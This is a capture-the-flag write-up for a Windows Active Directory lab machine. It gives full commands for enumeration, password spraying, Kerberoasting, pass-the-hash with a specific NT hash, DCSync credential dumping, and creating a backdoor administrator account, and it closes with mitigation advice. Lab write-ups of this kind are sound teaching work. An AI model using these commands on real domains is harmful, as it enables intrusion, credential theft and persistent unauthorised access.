SoupeDecode 01 Writeup

Overview

Test your enumeration skills on this boot-to-root machine. SoupeDecode 01 is a Windows Domain Controller challenge that demonstrates common Active Directory enumeration techniques, password spraying attacks, and privilege escalation through computer account compromise.

Room Objectives

This room covers Windows domain exploitation concepts including:

• Initial enumeration with nmap
• Username enumeration using RID cycling
• Password spraying attacks
• SMB share enumeration and access
• Kerberoasting for service account compromise
• Computer account privilege escalation
• Domain credential dumping via DCSync
• Remote desktop access and post-exploitation

1. Enumeration

Starting with standard nmap enumeration to identify services and domain information:

sudo nmap -sCV -O 10.201.48.23

Key findings from the scan:

• The target is a Domain Controller (DC)
• Domain: soupedecode.local
• FQDN: DC01.soupedecode.local
• No web application running (unusual for CTF challenges)

The absence of a web application means we need alternative methods for username enumeration. Since this is a creative approach, we'll use the Guest account for RID cycling to enumerate domain users.

2. Username Enumeration

Add the domain to hosts file for proper resolution:

sudo mousepad /etc/hosts

Add entry: soupedecode.local

Use lookupsid.py with Guest credentials to enumerate domain users via RID cycling:

/usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/guest@10.201.48.23 >> RawNames.txt

Parse the output to extract clean usernames using PowerShell:

$Filename = ".\SoupeDecode\RawNames.txt"
$Output = "soupdecode_users.txt"
$Lines = Get-Content "$Filename"

ForEach($Line in $Lines)
{
($Line.split("\")[1]).split(" ")[0] | Out-File ".\$Output" -Append
}
            

3. Initial Access

Attempt password spraying using username-as-password technique. This is efficient since rockyou.txt would be too large for online attacks:

/home/kali/Downloads/kerbrute_linux_amd64 passwordspray --domain soupedecode.local --dc 10.201.1.43 --user-as-pass /home/kali/Downloads/THM/soupedecode_users.txt

4. Lateral Movement

With valid credentials, perform authenticated enumeration:

enum4linux -u soupedecode.local\\ybob317 -p ybob317 -a 10.201.1.43

Discover accessible SMB shares: Users and backup. Enumerate the Users share:

smbclient \\\\10.201.1.43\\Users -U soupedecode.local\\ybob317

cd ybob317\Desktop

more user.txt

5. Kerberoasting

Attempt Kerberoasting to find service accounts with weak passwords:

/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request soupedecode.local/ybob317 -dc-ip 10.201.1.43 -outputfile /home/kali/Downloads/THM/Roasted.txt

Crack the obtained hashes:

john /home/kali/Downloads/THM/Roasted.txt --format=krb5tgs --wordlist=/home/kali/rockyou.txt

Password spray the cracked password against accounts with SPNs:

crackmapexec smb 10.201.1.43 -u /home/kali/Downloads/THM/TryThese.txt -p 'Password123!!' -d soupedecode.local

6. Privilege Escalation

With file_svc credentials, access the backup share:

smbclient \\\\10.201.1.43\\backup -U soupedecode.local\\file_svc

more backup_extract.txt

Extract NTLM hashes from the backup file and perform Pass-the-Hash attacks:

crackmapexec smb 10.201.1.43 -u /home/kali/Downloads/THM/TryThese.txt -H /home/kali/Downloads/THM/RawHashes.txt -d soupedecode.local --continue-on-success

Use the computer account to access the C$ share and retrieve the root flag:

smbclient //10.201.1.43/C$ -U FileServer$ --pw-nt-hash e41da7e79a4c76dbd9cf79d1cb325559 -W soupedecode.local

cd /Users/Administrator/Desktop

more root.txt

7. Post-Compromise Activities

Perform DCSync attack using the compromised computer account:

/usr/share/doc/python3-impacket/examples/secretsdump.py 'soupedecode.local/FileServer$@10.201.1.43' -hashes :e41da7e79a4c76dbd9cf79d1cb325559 -just-dc

Establish persistent access by creating a new administrative account:

/usr/share/doc/python3-impacket/examples/wmiexec.py soupedecode.local/Administrator@10.201.72.72 -hashes aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f

net user Mishky Password123 /add

net localgroup administrators Mishky /add

Connect via RDP for GUI access:

xfreerdp /v:10.201.124.61 /u:Mishky /p:Password123 /dynamic-resolution

Note: The target runs Windows Server 2022 Datacenter Core (no GUI), which is an interesting configuration choice for the challenge.

Active Directory Attack Techniques

Enumeration Methods

• RID Cycling: Using lookupsid.py to enumerate domain users
• SMB Enumeration: enum4linux for comprehensive domain reconnaissance
• Share Discovery: Identifying accessible SMB shares and their contents

Authentication Attacks

• Password Spraying: Efficient online attack using username-as-password
• Kerberoasting: Extracting service account hashes for offline cracking
• Pass-the-Hash: Using NTLM hashes for authentication

Privilege Escalation

• Computer Account Abuse: Leveraging computer accounts for elevated access
• DCSync Attack: Extracting domain credentials from DC
• WMI Execution: Remote command execution via Windows Management Instrumentation

Security Lessons

• Username enumeration via RID cycling can reveal domain user accounts
• Weak password policies enable password spraying attacks
• Service accounts with Kerberos SPNs are vulnerable to Kerberoasting
• Computer accounts can have excessive privileges in domain environments
• Backup files may contain sensitive credential information
• DCSync rights allow complete domain credential extraction
• Guest accounts should be disabled or have minimal privileges
• Regular password audits and complexity requirements are essential
• Network segmentation and least privilege should be enforced

Tools Used

• nmap: Network scanning and service enumeration
• lookupsid.py: RID cycling for username enumeration
• kerbrute: Password spraying tool
• enum4linux: Windows/Samba enumeration
• smbclient: SMB share access and file transfer
• GetUserSPNs.py: Kerberoasting attack
• john: Password cracking
• crackmapexec: Authentication testing and exploitation
• secretsdump.py: DCSync and credential dumping
• wmiexec.py: Remote command execution
• xfreerdp: RDP client for GUI access

Useful Commands

# Nmap enumeration
sudo nmap -sCV -O 

# RID cycling enumeration
lookupsid.py domain/guest@

# Password spraying
kerbrute passwordspray --domain domain.local --dc  --user-as-pass userlist.txt

# SMB enumeration
enum4linux -u domain\\user -p password -a 

# SMB share access
smbclient \\\\\\share -U domain\\user

# Kerberoasting
GetUserSPNs.py -request domain/user -dc-ip 

# Hash cracking
john hashes.txt --format=krb5tgs --wordlist=rockyou.txt

# Pass-the-hash
crackmapexec smb  -u users.txt -H hashes.txt -d domain.local

# DCSync attack
secretsdump.py 'domain/computer$@' -hashes : -just-dc

# WMI execution
wmiexec.py domain/admin@ -hashes :

# RDP connection
xfreerdp /v: /u:username /p:password /dynamic-resolution
            

Mitigation Strategies

Password Security

• Enforce strong password policies with complexity requirements
• Implement account lockout policies after failed attempts
• Use multi-factor authentication for all accounts
• Regular password audits and forced rotation

Account Security

• Disable Guest account or restrict its privileges
• Limit computer account privileges
• Regular review of service account permissions
• Implement principle of least privilege

Monitoring and Detection

• Monitor for unusual authentication patterns
• Detect Kerberoasting attempts via event logs
• Implement network segmentation
• Use SIEM for correlation of security events